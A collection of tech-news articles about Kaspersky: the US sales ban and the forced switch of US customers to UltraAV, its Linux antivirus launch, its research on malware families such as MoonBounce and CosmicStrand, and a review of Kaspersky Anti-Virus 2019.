Kaspersky, which is prohibited from selling its products in the United States due to national security concerns, has expanded into the Linux market. The Russian cybersecurity firm has ported its flagship antivirus software for Linux at an initial price of $53.99 for the first year, rising to $89.99 thereafter. With this new offering, Kaspersky is targeting Linux home users outside the United States.

It is widely recognized that Microsoft Windows constitutes the most predominant operating system targeted by infiltrators. Conversely, Linux and macOS are comparatively less susceptible, yet not entirely invulnerable. Nevertheless, Linux has been a frequent target for malicious actors, primarily because most servers and cloud providers worldwide run Linux. Given this trend, there exists an opportunity for cybersecurity firms to capitalize and offer antivirus protection to consumers. Kaspersky is consequently leveraging its reputation to introduce its antivirus software to the Linux market.

Kaspersky, like many other providers, offers tiered plans. Kaspersky Standard is the regular antivirus software; meanwhile, Kaspersky Plus and Kaspersky Premium are comprehensive internet security and total security solutions, respectively, with additional features such as a VPN, password manager, wallet protection, and more.

Regarding pricing for a single device, Kaspersky Standard starts at $59.99, while Kaspersky Plus and Kaspersky Premium cost $79.99 and $89.99, respectively. First-time Linux users are eligible for a discount of up to 40% for the first year.

Kaspersky Antivirus For Linux Pricing

Kaspersky for Linux supports 64-bit Linux distributions, including Ubuntu 24.04, ALT Linux 10, Uncom 2.3.5, and RED OS 7. The company provides its installer in DEB and RPM package formats. The minimum system requirements will be a joke to some. It asks for a Core 2 Duo 1.86 GHz processor, 2GB of memory, 1GB of swap space, and 4GB of available disk space.

Kaspersky emphasizes that the Linux version does not meet GDPR compliance standards. Like competitors, the company offers a 30-day free trial of Kaspersky for Linux, allowing you to evaluate the software before committing. At an annual cost of $59.99, Kaspersky for Linux presents a challenging proposition, particularly within a community where antivirus software is not a priority and political opinions are divided. Additionally, ClamAV—a widely-used, free, and open-source antivirus solution—remains prevalent within the Linux community.

Kaspersky, a Russian cybersecurity firm, ceased its U.S. operations but has automatically replaced its antivirus software on American computers with UltraAV. No warning was given that the switch would occur on the day, reports Bleeping Computer. This decision follows the U.S. government's ban on Kaspersky software updates and sales, which takes effect on September 29, 2024, over national security concerns. 

Earlier this year Kaspersky was added to the U.S. Entity List due to national security concerns and had to halt business in the U.S. In July, Kaspersky began laying off U.S. employees and preparing to close operations. In September the company notified its customers that they would be transitioned to UltraAV, an antivirus from Pango Group. However, the abrupt transition occurred without warning via an automatic update a few days ago.

"Following the recent decision by the U.S. Department of Commerce that prohibits Kaspersky from selling or updating certain antivirus products in the United States, Kaspersky partnered with antivirus provider UltraAV to ensure continued protection for US-based customers that will no longer have access to Kaspersky’s protections," a statement by Kaspersky reads. "Kaspersky and UltraAV worked closely to ensure customers would maintain the standards of security and privacy users have come to expect from their service." 

Many users were surprised to find that Kaspersky software was abruptly removed from their devices and UltraAV installed instead. This occurred through an automatic update on September 19, 2024, and was intended to avoid any disruption in protection. Customers reported confusion and concerns, some even feared that malware had infiltrated their systems due to the unannounced switch. Those previously subscribed to Kaspersky's VPN services also found that UltraVPN was installed, unexpectedly. 

Additionally, some users had difficulty uninstalling UltraAV, which reappeared after rebooting their devices.  

Kaspersky defended its decision, explaining that the transition was made to ensure continued protection for U.S. customers after the company's departure from the market. The company assured users that UltraAV offers a similar set of features to Kaspersky's previous software. Meanwhile, UltraAV claims that its services are even better than Kaspersky's as it offers $1 million identity theft compensation.  

"If you are a paying Kaspersky customer, when the transition is complete UltraAV protection will be active on your device and you will be able to leverage all of the additional premium features," a statement by UltraAV reads. "Your billing schedule with UltraAV will be the same as your Kaspersky account. Annual and monthly billing will remain the same."

Kaspersky Lab, a Russian cybersecurity and antivirus software company, announced it will start shutting down all of its operations in the U.S. on July 20. The departure was inevitable after 12 of the company’s executives were hit with sanctions, and the company’s products were banned from sale in the U.S.

Kaspersky Lab told BleepingComputer of the pending closure and confirmed it would lay off all of its U.S.-based employees. Reportedly, the shutdown affects less than 50 employees in the U.S. The impact on cybersecurity could be much greater since the company’s researchers have been responsible for stopping or slowing countless major security exploits.

The United States government has claimed that Kaspersky’s continued operations in the U.S. posed a significant privacy risk. Since Kaspersky is based in Russia, officials worry the Russian government could exploit the cybersecurity firm to collect and weaponize sensitive U.S. information.

In June, the Department of Commerce’s Bureau of Industry & Security (BIS) issued sanctions on Kaspersky. A Final Determination hearing resulted in Kaspersky being banned from providing any antivirus or cybersecurity solutions to anyone in the United States. Kaspersky’s customers in the U.S. have until September 29, 2024, to find alternative security and antivirus software.

Kaspersky told BleepingComputer that it had “carefully examined and evaluated the impact of the U.S. legal requirements and made this sad and difficult decision as business opportunities in the country are no longer viable.” After all, it’s hard to run a business that provides cybersecurity and antivirus solutions when you’re banned from doing so.

The BIS placed Kaspersky Lab and its U.K. holding company on the U.S. government’s Entity List because of their ties to Russia. This prevented Kaspersky from conducting business in the U.S. At the same time, a dozen members of Kaspersky’s board of executives and leadership were individually sanctioned.

These sanctions froze the executives’ U.S. assets and prevented access to them until the sanctions were lifted. While Kaspersky insisted the ban was based on theoretical concerns rather than evidence of wrongdoing, sources close to the matter have said otherwise. Russian backdoors into Kaspersky’s software are an “open secret,” they said, and a Commerce Department official stated the department believes it is more than just a theoretical threat.

Kaspersky Lab, a Russian-based antivirus and cybersecurity company, has received two rounds of sanctions from the U.S. government. Kaspersky Antivirus products have been banned from sale in the U.S., with users having 100 days to find a functioning replacement before all functionality is ended.

Fearing connections with the Russian government, the United States Department of Commerce’s Bureau of Industry and Security (BIS) issued the first sanctions on Kaspersky on Thursday, issuing a Final Determination banning Kaspersky from providing antivirus or cybersecurity solutions to anyone in the United States. The sweeping ban was the first of its kind issued by the BIS after expanded powers were granted by the last two presidents of the United States.

The U.S. also placed Kaspersky Lab and its U.K. holding company on the Entity List, cutting them off from any U.S. trade entirely. The next day, twelve members of Kaspersky Lab’s board of executives and leadership were individually sanctioned, with most of Kaspersky Lab’s C-suite receiving individual punishment for their association with Kaspersky and suspected association with the Russian government. CEO and founder Eugene Kaspersky was excluded from this round of sanctions.

The United States government claims Kaspersky’s operation in the U.S. is a significant privacy risk due to Kaspersky’s operations in Russia, the site of its world headquarters. “Russia has shown time and again they have the capability and intent to exploit Russian companies, like Kaspersky Lab, to collect and weaponize sensitive U.S. information,” said Commerce Secretary Gina Raimondo. “We will continue to use every tool at our disposal to safeguard U.S. national security and the American people.” Under Secretary for Industry and Security Alan Estevez added, “With today’s action, the American cyber ecosystem is safer and more secure than it was yesterday.”

Kaspersky’s comments on the sanctions read as disappointed. “Kaspersky believes that the Department of Commerce made its decision based on the present geopolitical climate and theoretical concerns rather than on a comprehensive evaluation of the integrity of Kaspersky’s products and services,” Kaspersky claims it offered several alternative solutions, including a verified third party to verify the safety of Kaspersky programs independently, but these solutions were denied.

Kaspersky is also well-known for its industry-leading malware research, which has stopped or slowed countless major security exploits, including the ShrinkLocker exploit Kaspersky found in May. The sanctions will impact its ability to provide the exact security solutions to U.S. citizens. “Kaspersky has implemented significant transparency measures unmatched by any of its cybersecurity industry peers to demonstrate its enduring commitment to integrity and trustworthiness. The Department of Commerce’s decision unfairly ignores the evidence. The primary impact of these measures will be the benefit they provide to cybercrime.”

Kaspersky’s total U.S. ban was not surprising. Kaspersky software has not been allowed on government computers since 2017, and the full-scale ban follows the Department of Commerce’s aggressive stance against potential threat vectors. It is important to note that the Commerce Department’s final determination, sanction listing, and other communications do not list any evidence of any malicious action ever taken by Kaspersky. However, sources close to the matter claim Kaspersky Lab’s Russian backdoors are an “open secret,” with a Commerce Department official speaking anonymously, saying, “We certainly believe that it’s more than just a theoretical threat that we described.”

CosmicStrand is the latest in a string of sophisticated malware that reaches hardware bits you'd think were much harder to breach than your typical OS installation. But harder to breach doesn't mean unreachable, as any cybersecurity researcher will tell you. Researchers have recently found strands of a particularly nifty piece of malware lurking in both ASUS and Gigabyte motherboards based on Intel's H81 chipset. CosmicStrand has evolved since its first appearance back in 2016, and it's currently unclear if the breakout is confined to both companies' offerings of the larger motherboard market yet holds a darker revelation.

Researchers from Kaspersky labs found the malware stranded in the motherboards' Unified Extensible Firmware Interface (UEFI) - their boot sector, so to speak, which is tasked with identifying, verifying and booting up all the connected hardware bits. From simple fans spinning up all the way to your PC's overclocking capabilities on the latest and greatest gaming CPUs - it all leads to your PC's BIOS. For the sake of clarity, this isn't the first such threat discovered - but one is already too many, and it does add to possible infection vectors.

Being the first thing to run within your system - long before any antivirus solution you might have can even be loaded into memory - BIOS-borne malware can be exceedingly difficult to remove. It can evade most antivirus applications, can't be deleted by a fresh OS install, and it also naturally survives storage wipes, three of the most common ways of getting rid of security threats such as these.

Things get especially tricky when the malware can deploy itself at the kernel level towards your OS - at every boot. As a reminder, the kernel is the heart of your OS and is responsible for interfacing your hardware with the operating system's high-level functions. Of course, all OSes possess safeguards against kernel tampering, but in this case, Microsoft's solution, ThreatGuard, is neutered by the malware before its execution.

As Kaspersky's analysis of the malware shows, hijacking the kernel allows the malware to control the startup flow of the entire OS, allowing it to prioritize processes that would enable it to reach a command and control server from where it can download the rest of its payload. Kaspersky estimates that this particular malware strand had to be directly written for the motherboards' BIOS - it doesn't seem like it was an internet-borne piece of kit.

For now, the infections seem confined to China, Vietnam, Iran, and Russia. Kaspersky notes that they detected the malware on three of its customers' computers. All of the customers were running different versions of Kaspersky's security software, and none shared any connection via a corporation, employer, or otherwise, adding an air of mystery as to the purpose of the infections in the first place.

Kasperky's analysis indicates that the adapted CosmicStrand malware was created by Chinese-speaking threat actors due to coding similarities with the payload responsible for the MyKings botnet - which itself included leftover Chinese characters throughout. Of course, this isn't a black and white world: the Chinese snippets could have been placed there to derail investigators. More time - and perhaps more cases - are needed before reaching any definitive answer.

Kaspersky does note that CosmicStrand's characteristics placed its creation back in 2016 - that's how long this infection vector managed to slip by unnoticed. It's currently unclear how many other computers could be infected. We're likely to see infection numbers increase as Kaspersky and other security providers hone in on this threat.

This also raises the question of what BIOS malware might be lurking about today, with years of time to further develop and refine an, until now, unknown threat.

Cybersecurity is - and will never cease to be - a game of cat and mouse between security researchers and threat actors. But considering what we know today about this particular malware infection and how it's achieved, we can only suggest that users be wary of purchasing H81-based motherboards in the second-hand market. If they do, always remember to run an antivirus check, which is a good practice for any PC built around hardware whose parts were in someone else's control.

A new type of malware takes a decidedly more stealthy and hard-to-remove path into your OS — it hides in your BIOS chip and thus remains even after you reinstall your OS or format your hard drive.

Kaspersky has observed the growth of Unified Extensible Firmware Interface (UEFI) firmware malware threats since 2019, with most storing malware on the EFI System Partition of the PC's storage device. However, a sinister development has been spotted over the New Year with a new UEFI malware, detected by Kasperksy's firmware scanner logs, that implants malicious code into the motherboard's Serial Peripheral Interface (SPI) Flash. The security researchers have dubbed this flash-resident UEFI malware 'MoonBounce'.

MoonBounce isn't the first UEFI malware discovered in the wild that targets SPI flash. Kaspersky says that the likes of LoJax and MosaicRegressor came before it. However, MoonBounce shows "significant advancement, with a more complicated attack flow and greater technical sophistication." It also seems to have infected a machine remotely.

MoonBounce is undeniably clever in the way it gets into a system and makes itself hard to detect and dispose of. "The source of the infection starts with a set of hooks that intercept the execution of several functions in the EFI Boot Services Table," explains Kaspersky on its SecureList blog. The hooks are then used to divert function calls to the malicious shellcode that the attackers have appended to the CORE_DXE image. This, in turn, "sets up additional hooks in subsequent components of the boot chain, namely the Windows loader," said the security researchers. This allows the malware to be injected into an svchost.exe process when the computer boots into Windows.

Transport Technology Company the Only Logged Attack so Far

Of course, Kaspersky was interested to see what the malware would do next. So, on an infected machine, the researchers observed the malware process try and access a URL to fetch the next stage payload and run it in memory. Interestingly, this part of the sophisticated attack didn't seem to go anywhere, so it wasn't possible to analyze any further steps in MoonBounce. Perhaps this malware was still in testing when it was spotted, and/or it is being held back for special purposes. In addition, the malware isn't file-based and does at least some of its operations only in memory, making it hard to see exactly what MoonBounce did on the single host PC on a company's network.

A single machine, owned by a transportation company, seems to be the only machine on Kaspersky's logs that has a MoonBounce infection in its SPI Flash. It isn't certain how the infection took place, but it is thought it was instigated remotely. That sole machine at a transport technology company seems to have spread non-UEFI malware implants to other machines on the network. With much of its work being file-less and memory resident only, it isn't easy to observe from this single sample.

Below, a flow chart breaks down how MoonBounce boots and deploys from the moment your UEFI PC is switched on, through Windows loading, and into being a usable but infected PC.

APT41 Fingerprints Detected

Another important branch of the work done by security researchers like Kaspersky is looking into who is behind the malware that it discovers, what the purposes of the malware are, and what specific targets the malware is primed for.

Concerning MoonBounce, Kaspersky seems pretty certain that this malware is the product of APT41, "a threat actor that's been widely reported to be Chinese-speaking." In this case, the smoking gun is a "unique certificate" that the FBI has previously reported as signaling the use of APT41-owned infrastructure. APT41 has a history of supply chain attacks, so this is a continuation of a central thread of APT41's nefarious operations.

Safety Measures

To help avoid falling victim to MoonBounce or similar UEFI malware, Kaspersky suggests a number of measures. It recommends users keep their UEFI firmware updated directly from the manufacturer, verify that BootGuard is enabled where available, and enable Trust Platform Modules. Last but not least, it recommends a security solution that scans system firmware for issues so measures can be taken when UEFI malware is detected.

There's no doubt that the pandemic gave gaming a popularity boost over the past year, but that's also been accompanied by a boost in cyberattacks on gamers. Kaspersky reported this month that the number of malware and unwanted software posing as popular PC games that it detected (and prevented) surpassed 5.8 million from Q3 2020 to Q2 2021. 

Kaspersky examined attacks pretending to be the 24 most popular PC games and found 2.48 million detections globally in when pandemic-related lockdowns hit in Q2 2020. That's a 66% increase compared to Q1 2020. We'd expect even higher numbers would be reported if Kaspersky expanded its detection range. Kaspersky said the "increased volume may be connected to the rapid growth of gaming activities during the pandemic." 

Out of the 24 PC titles Kaspersky listed, the top five games with the highest amount of disguise malware were: Minecraft, The Sims 4, PUBG, Fortnite and Grand Theft Auto V (GTA V), with Minecraft far and way leading the pack.

These results aren’t too surprising since Minecraft, Sims and GTA V are especially known for their modding communities. Mods in general are rarely distributed through one secure location and are often distributed in many locations. This gives cybercriminals an easy way to disguise malware as gaming mods, especially to oblivious eyes.

The best way to ensure the security of game mods is to know exactly where the mod came from and from what platform. Downloading torrent files from an unknown source is an easy way to get attacked.

Thankfully, things seems to be getting better in 2021. In Q2 of 2021, Kaspersky only detected 636,904 detections such attacks compared to the 2.48 million recorded in Q2 2020. Kaspersky didn't specify why. We suspect it's due to PC gamers moving to other activities as the pandemic gets better. Or, perhaps, PC gamers have become incredibly smart...one can hope.

Mobile Gamers Also Targeted

Kaspersky also looked at the 10 most popular mobile games and reported that the number of affected mobile gamers grew by 185% from February 2020 to 3,253 mobile gamers in March 2020. 

On top of that, even though lockdowns have eased, cyberattacks on mobile gamers have continued as people keep playing on their phones. 

"Furthermore, the number of users striving to unwind on mobile phones did not drop significantly after the two waves of the pandemic, showing on average just a 10% drop in users attacked per month in Q2 2020 versus Q2 2021. This showed that mobile threats remained attractive to cybercriminals even as lockdowns were being lifted across the world," Kaspersky said. 

Researchers have discovered that the XCSSET malware has started targeting M1-equipped Macs via Xcode, The Hacker News reported Monday and has been updated to compromise accounts on various cryptocurrency trading platforms.

Xcode is the integrated development environment (IDE) used to make apps for the iPhone, iPad, and other Apple hardware. Even if a cross-platform framework is used to develop a particular app, it must pass through Xcode to reach those platforms.

That means XCCSET is limiting itself to technically savvy people who, if we had to guess, would be more likely to own cryptocurrency than the average Mac owner. Targeted attacks like this are often more successful than broader ones.

Kaspersky warned that XCSSET had been updated for Apple's custom silicon in March. The malware wasn't focused on cryptocurrency at the time, the security company said. Instead, it featured a variety of modules that were designed to:

• Reading and dumping Safari cookies
• Injecting malicious JavaScript code into various websites
• Stealing user files and information from applications, such as Notes, WeChat, Skype, Telegram, etc.
• Encrypting user files

Trend Micro then warned on April 16 that XCSSET had been updated to bypass security features introduced with macOS Big Sur, change the icons it uses to match system icons, and attempt to gain access to victims' accounts on crypto platforms.

The company's advice was clear: "To protect systems from this type of threat, users should only download apps from official and legitimate marketplaces," it said. But that's hard to do when it comes to finding Xcode projects to work with or learn from.

XCSSET's expansion to cryptocurrency makes sense. The value of Bitcoin, Ethereum, and even Dogecoin has continued to rise in recent months, and stealing coins from someone else is probably requires fewer resources than mining them would.

Adding support for Apple's custom silicon was also prudent. Devices featuring the M1 chip have been well-reviewed, and with Apple's plan to ditch Intel entirely by the end of 2022, it makes sense to start targeting its chips now.

Other malware creators appear to agree. We saw reports of the first malware targeting Apple silicon in February, and in March, the Silver Sparrow malware was discovered on approximately 30,000 macOS devices, some of which had M1 chips.

Despite the current state of Cyberpunk 2077, eager fans everywhere are still trying to get as much time with the game as they can. This presented the opportunity for some sneaky person/persons to take advantage of this by creating ransomware and disguising it as a mobile version of the game. According to Kaspersky's malware analyst, Tatyana Shishkova, a fraudulent website has been crafted to look like the Google Play Store and offers a mobile version of Cyberpunk 2077. But in actuality, this website has been tricking people into downloading and installing ransomware onto their mobile devices.

This ransomware has been dubbed Coderware, and once it infects a mobile device, the contents are encrypted. The unwilling participants are notified that they have 10 hours to send $500 in bitcoins to the ransomware creator. Failing to do so will result in the encrypted file being permanently deleted; unless you have a backup that isn't infected.

Fortunately, not all is lost as it has been discovered that the ransomware attack uses the same variant as the BlackKingdom ransomware that was released in early 2020. This was pointed out by Tatyana Shishkova, who also provides a way to get around the ransomware. Unlike the BlackKingdom ransomware, the Coderware ransomware uses a hardcoded key, meaning that individuals can use a decryptor to gain access to the encrypted file without paying the hefty sum.

The decryptor is found inside of the source code, as seen in the example below.

Of course, the best way to protect your mobile device is to not download and install unofficial software to it. There is no mobile version of Cyberpunk 2077, nor has there been any announcement of one in development. The only place to play the title is PlayStation 4, PlayStation 5, Xbox One, Xbox Series X|S, PC, and Stadia. 

Kaspersky has put the blame squarely on Microsoft after a recent Windows 10 update (KB4524244) meant to further protect against an attack that exploited a vulnerable version of the Kaspersky Rescue Disk software has caused more system crashes. The security company claimed that it had already patched the vulnerability in August 2019.

Microsoft recently had to cancel a Windows 10 update after it caused issues and broke features on users’ computers. According to Kaskpersky, Microsoft updated its UEFI signatures list to revoke certain UEFI signatures that were being used with older and maliciously modified versions of the Kaspersky Rescue Disk. 

Kaspersky said that its software is not at fault for the update incompatibility. Microsoft may have been right to revoke the UEFI signature that was being abused by attackers, but the main issue here seems to be that Microsoft didn’t bother to also warn Kaspersky about it so Kaspersky could take the necessary steps to support the new UEFI signature. 

This isn’t the first time Kaspersky as well as other companies have accused Microsoft of not communicating well enough about changes that impact third-party developers, which often results in various software conflicts and system crashes for users. Microsoft may also get little sympathy from users, considering how many issues its updates have caused over the past year or so.

According to Kaspersky, if the new Windows 10 update hasn’t caused you an issue, then you won’t need to remove it. Microsoft also said that the update won’t be re-issued, but that fixes for the new bugs will be coming soon.

According to Kasperky Labs research shared this week, Shlayer malware has infected one in 10 macOS users. It typically installs via a fake Flash update that prompts users of websites with fake streaming TV shows and sports feeds. Shlayer is reportedly the most popular piece of malware on the macOS platform currently in terms of number of detections.

Most Common Malware on macOS

If Shlayer is so popular on macOS, a platform that used to be known as 'virus-free,' (likely due to its low user base, more than anything), then surely it must be a very advanced malware to keeps outsmarting both Apple and users, right? Not so. 

The malware simply tricks users into thinking it’s an update for the Flash software  necessary to play videos. Shlayer usually comes embedded in fake pirated online shows and live sports feeds that prompt someone to install the fake Flash update before the video can be streamed online. In fact, it’s one of the most common types of malware that we’ve seen in the past on the Windows platform, too.

The malware primarily targets the U.S. (31% of detections), Germany (14%), France (10%) and the and UK (10%). 

Kaspersky's blog post said Shlayer is by far the most common malware family hitting macOS systems, representing 30% of all detections for the OS. Since 2018, when the security company first identified it, it's collected almost 30,000 samples of the trojan and identified 143 command and control (C&C) server domains. 

How did Shlayer get so popular so quickly? It appears that the creators of Shlayer have gone with a bold promotion: pay those who install the malware on various video streaming sites a high commission fee. According to Kaspersky, the fee is significantly higher than what other malware families with similar monetization strategies pay.

The latest promotion technique for the malware seems to be using expired domains still featured on sites like YouTube and Wikipedia. 

The next version of Safari will end support for the real Flash player for good, as will all the other major browsers, including Chrome and Firefox. This sort of social engineering shouldn’t work once people are aware that Flash can no longer work with their browser. However, the malware will likely continue to trick users for years, as not everyone stays abreast of the latest news in the Flash world.

Antivirus company Kaspersky uncovered an advanced persistent threat (APT) group that had been operating stealthily from at least 2009 until 2017. Kaspersky has named the newly discovered APT group DarkUniverse. 

The security vendor uncovered the threat as part of its investigation of the “Shadow Brokers” data leak from 2017. DarkUniverse used spear phishing to spread its own malware via malicious Microsoft Office documents. According to Kaspersky, each email was specifically crafted for each high-value targets. 

Kaspersky believes that DarkUniverse is part of the ItaDuke, a malicious group that has been known since 2013, because much of the exploitation code used by the two groups overlaps. ItaDuke has primarily infected victims via spear phishing with malicious PDF files and has also used Twitter accounts to store command and control (C2) server URLs. 

The DarkUniverse hackers seem to have been well-funded, as their tools evolved significantly over the years. "Since the framework evolved from 2009 to 2017, the last releases are totally different from the first ones," Kaspersky said. 

Kaspersky also noted that the malware framework DarkUniverse used includes all the necessary modules needed to collect all kinds of information about the target victims and their devices. The framework seems to have been developed from scratch. 

According to Kaspersky, DarkUniverse seemingly suspended its operations when the Shadow Brokers' data leak, containing many NSA tools, went public in 2017. It's not clear whether or not this was a coincidence, or if the DarkUniverse groups has ties to the NSA.

Cybersecurity experts at Kaspersky identified a string of malware that affects encrypted communication by modifying Chrome and Firefox install files. They first discovered the malicious code in April of 2019 and released an analysis of their findings this week.

The team at Kaspersky calls the new malware Reductor. It's a type of malware known as a remote access trojan (RAT for short). RAT malware opens a machine to vulnerabilities across a network, where malicious users can upload and download data or even execute code on the machine from a remote location.

The programmers behind Reductor went above and beyond with their creation—the official announcement from Kaspersky even called it "impressive." Reductor works by modifying Chrome and Firefox local installation files. It then marks outbound TLS traffic with a unique identifier. This fingerprint makes it possible to track the following traffic, even when using an encrypted channel.

"Analysis of the malware allowed us to confirm that the operators have some control over the target’s network channel and could replace legitimate installers with infected ones on the fly," Kaspersky stated.

As of October, only targets in Russia and Belarus have been identified. The end goal of Reductor isn't clear as of yet. The team speculates it may be a form of redundancy in case a person removes the Reductor trojan from the computer.

According to Kaspersky, the Kaspersky Attribution Engine showed significant similarities between Reductor and a previous string of malware known as COMPfun, initially documented in 2014. Because of these similarities, the team is quite sure Reductor and COMPfun comes from the same developers.

Kaspersky security researchers were able to uncover some hacking operations launched by what's believed to be an intelligence agency in Uzbekistan. According to the researchers, the Uzbekistan spies were easy to catch due to their incredibly bad operational security (opsec).

A SandCat and Mouse Game

As reported by Vice, Kaspersky researchers recently found a hacking group that it believes is an intelligence agency from Uzbekistan. Kaspersky originally named the group “SandCat,” but now it's believed that SandCat is actually the Uzbekistan government's State Security Service (SSS).

One of the group's questionable opsec practices included using "the name of a military group with ties to the SSS" for registration of one the domains in the attack infrastructure, according to Vice. 

Another error SandCat made was installing Kaspersky Anti-Virus on the same machines it used to write the new malware. This allowed Kaspersky's antivirus telemetry to detect and collect the malicious code before it was deployed. Kaspersky actually got into Kaspersky actually got into big trouble over this feature not too long ago, when the U.S. government accused the vendor of stealing classified documents this way. But in this situation, Kaspersky used its antivirus’ detection feature to learn about four new zero-day exploits that SandCat had purchased from third-party security vulnerability brokers. Kaspersky was later able to uncover the activities of Saudi and United Arab Emirates (UAE) state hacking groups that had purchased the same tools.

How SandCat Developed Its Hacking Capabilities

We know from an earlier hack against Hacking Team, an Italian company that sells hacking tools to government and law enforcement, that the SSS was a customer in 2011. Hacking Team was one of the most infamous surveillance tools companies from Italy that was selling surveillance and hacking software to repressive governments. But SSS’ cyber activities have flown under the radar until now.

Kaspersky actually uncovered traces of SandCat activities since 2018, but at the time it didn’t have reason to believe SandCat was the SSS. In 2018, SandCat was using a piece of malware called “Chainshot” that had also been used by the Saudi Arabia and UAE state groups. However, SandCat was using a different attack infrastructure from the other two countries, which led Kaspersky to believe that it must be an unrelated hacking group. One thing the Kaspersky researchers did know at the time is that whichever group it was, it had significant financial backing. They concluded this from the fact that the SandCat hackers were burning (using and them losing them to discovery by others) through their exploits like nothing. However, burning the exploits so quickly meant that Saudi Arabia and UAE couldn’t use them anymore either.

Kaspersky believes that for the latest attacks, SandCat purchased exploits from two Israeli companies, NSO Group and Candiru. The NSO Group has been accused in the past of selling surveillance tools to governments that target journalists and dissidents, but the company has denied the allegations. Candiru provides a surveillance and hacking operations management platform as a service to interested hacking groups.

The companies may have stopped selling its tools to SandCat in 2018. That’s when Kaspersky believes that the SandCat group might have started developing its own in-house tools. However, their poor opsec execution made it much easier for the group to get caught.

Kaspersky researchers believe that the recent discovery may force SandCat to improve its opsec, but at the same time it may have also put them in the spotlight. More security researchers are also now expected to look for SandCat tools and perhaps identify more of their victims.

Kaspersky is branching out from protecting PCs and businesses from cybersecurity threats and into protecting eSports players from unfairness. This week, it announced a beta version of Kaspersky Anti-Cheat, a tool specifically made for eSports organizations to ensure fair play.

It's not hard to guess why. Teams can win millions of dollars by playing in tournaments for popular titles like Dota 2, League of Legends and Counter-Strike: Global Offensive. Learning that someone managed to cheat during one of these tournaments--which has happened before--can lead to all sorts of problems for their organizers. (Should prizes be returned? Brackets changed?) When it comes to professional gaming, it's imperative the competition is fair.

The methods currently used to deter cheating vary from event to event. Blizzard carefully manages all of the equipment used for Overwatch League (a profesional eSports league for Overwatch players) matches, for example, while Ubisoft's partners for Rainbow Six Siege rely on anti-cheat solutions because many matches are played online. Organizers can largely decide for themselves how they want to maintain a level playing field in a given eSports title.

According to Kaspersky, its cloud-based solution is to be installed in players' systems, after which point "game process information is collected, sent to the Kaspersky Anti-Cheat cloud and analyzed for suspicious events." A referee then receives reports in real time through a web interface, leaving the ref and organization to decide what actions to take on the cheater.

Kaspersky partnered with StarLadder, which hosts tournaments for numerous titles, for a trial run of Kaspersky Anti-Cheat. StarLadder chief business development officer Alexander Chegrinez said in the announcement that it will "test this new solution at our tournaments to check how often players resort to dishonest behavior." Whether that will lead to a longer partnership or not likely depends on the tool's utility.

Kaspersky Anti-Cheat was also made available to game developers looking for a way to maintain integrity in non-eSports matches. The service has plenty of competition in that field, however, which could make it harder for Kaspersky's solution to gain traction.

More information about the service can be found on Kaspersky's website. Pricing information and other details aren't publicly available.

Kaspersky Lab, with over two decades of experience, is a household name in cybersecurity. Its current anti-malware suite, Kaspersky Anti-Virus 2019 brings plenty of features for keeping users safe while on the Internet.

The key to Kaspersky Anti-Virus is its intelligent behavioral model, which uses machine learning to identify malware through its behavior without the requirement of a prewritten virus signature. This suite assimilates nicely with Windows 10, working harmoniously with the operating system’s (OS’) included security tools to provide additional protection against the full spectrum of malware threats. Recently added detection capabilities also shut down outgoing requests to malicious servers.

Price

Kaspersky Anti-Virus is priced to be competitive, starting at $29.99 (£23) for a 3 PC, 1-year license. You can lower the annual price per device by adding PCs and extending the subscription to up to three years.

Kaspersky’s pricing scheme differs from competitors like ESET NOD32 or Norton AntiVirus with starting prices ($39.99) for protecting just 1 PC.

To protect PC, Mac and mobile device, Kaspersky offers two pricer options:

• Kaspersky Internet Security: starts at $39.99 (3 devices, 1 year)
• Kaspersky Total Security: starts at $49.99 (5 devices, 1 year, 2 user accounts)

All Kaspersky consumer products offer a full 30-day trial. It is a 100% free download, and you can try it on your PC without entering payment information.

Setup and User Interface

The Kaspersky Anti-Virus installation process is easy, streamlined and quick. To start, sign up for a free trial via Kaspersky’s website, where you’ll get a small download file. After accepting the license agreement, the installation package automatically downloads. We were able to complete installation without a license or putting in an email address. We did use the “Activate Trial License” link to complete setup.

However, there was an additional step. Kapersky’s dashboard next updated the signatures and program files. Most other antivirus software automatically does this quietly in the background during the installation. On the other hand, being able to manage the update will be an asset for some users.

Kaspersky Anti-Virus took up about 275MB of space on our hard drive, with just two core processes, requiring a comparatively low 90MB RAM, running in the background. It’s safe to say that this program is light on system resources.

Kaspersky Anti-Virus uses a simple interface to disclose the current protection status through a clean visual display with green indicators. Four main buttons cover all the essential tasks: launching a scan, updating a database, viewing a report and accessing the on-screen keyboard.

Antivirus Scans

The Scan panel is used to initiate a quick or full system scan and can completely disinfect the entire storage drive or hone in on specific files and folders. The downside is that you have to do more navigation than is required of competitors. For example, three clicks are inputted into the console to set off a Quick Scan--not so quick, ultimately.

Our testing confirmed that this version of antivirus software is Kaspersky’s fastest to date. The Quick and Full scans both finished faster than the average for an antivirus suite when we benchmarked the software on our review system.

We appreciate the simple scheduler that runs various scan types on an automated basis, which specifies scans for a daily, weekly or monthly interval. The custom configuration option is useful for scheduling a scan on the next day when the system is powered off, which will have less impact on your PC’s performance, and to limit scans to a locked or sleeping computer.

Kaspersky Anti-Virus has choices for finely tuning each scan type, down to the details of the zone to be scrubbed, the type of file to be examined, a selection of the detection engine and the plan for detected threats (disinfecting the file, deleting it, or asking what’s next). The options are aplenty. You can speed up Quick Scans by configuring Kaspersky to skip old files, only sanitize new and modified files. Or maybe you only want to use Full System Scans to scrub specific network folders. Just remember that granular control does have its compromises, as speeding up scans can reduce your level of malware protection.

The Vulnerability Scan gives an assessment of how secure your system is, looking for expired security patches, vulnerable Windows settings and more. When we ran the scan on our test PC, we were informed that autorun for removable drives is enabled by default and were able to address it with a few clicks. This was a helpful alert, considering that having this feature enabled makes the system vulnerable to USB key-based malware.

Even with all the different scan types, we still yearn for the ability to implement true custom scan types. The option to create an 'Ultra Quick Scan' with just a few clicks would be welcome and also retain the option for the original Quick Scan. Major competitors, including Avast and Avira, offer these options to appease their expert users, who many find Kaspersky’s limitation of existing scan types only too, well, limiting.

Antivirus Testing and Performance

We pit Kaspersky Anti-Virus against our homebrew ransomware simulator. Although it is fairly simple, there is no chance of it being a known threat to Kaspersky, which means the software would need to identify it from its behavior, not from virus signatures.

Our ransomware got running, and the Kaspersky System Watcher module monitored the simulated ransomware’s behavior. First, there was a quick notification that this ransomware indeed was a threat, before the software neutralized the process. Next, the antivirus deleted the ransomware file from the PC. The ransomware did manage to encrypt a handful of document files before Kaspersky could neutralize it. But this turned out to be no problem, as Kaspersky Anti-Virus easily decrypted and restored the original files, so nothing was lost. An impressive performance, this validates that Kaspersky safeguards against even yet-to-be-discovered threats with ease.

